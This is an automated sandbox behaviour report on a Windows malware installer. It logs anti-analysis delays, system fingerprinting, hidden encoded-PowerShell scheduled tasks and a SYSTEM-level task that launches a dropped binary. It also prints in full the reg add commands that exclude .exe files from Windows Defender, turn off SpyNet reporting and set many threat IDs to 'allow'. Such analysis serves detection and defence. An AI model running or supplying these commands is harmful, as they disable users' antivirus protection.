Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 2463 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9454Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2463Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040553A FindFirstFileA,1_2_0040553A
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,1_2_004055DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: file.exeBinary or memory string: V{TvMci:
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00418320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0041584A SetUnhandledExceptionFilter,1_2_0041584A
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0041585C SetUnhandledExceptionFilter,1_2_0041585C

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gahelfxgt" /sc once /st 12:43:49 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gahelfxgt" /sc once /st 12:43:49 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /FJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
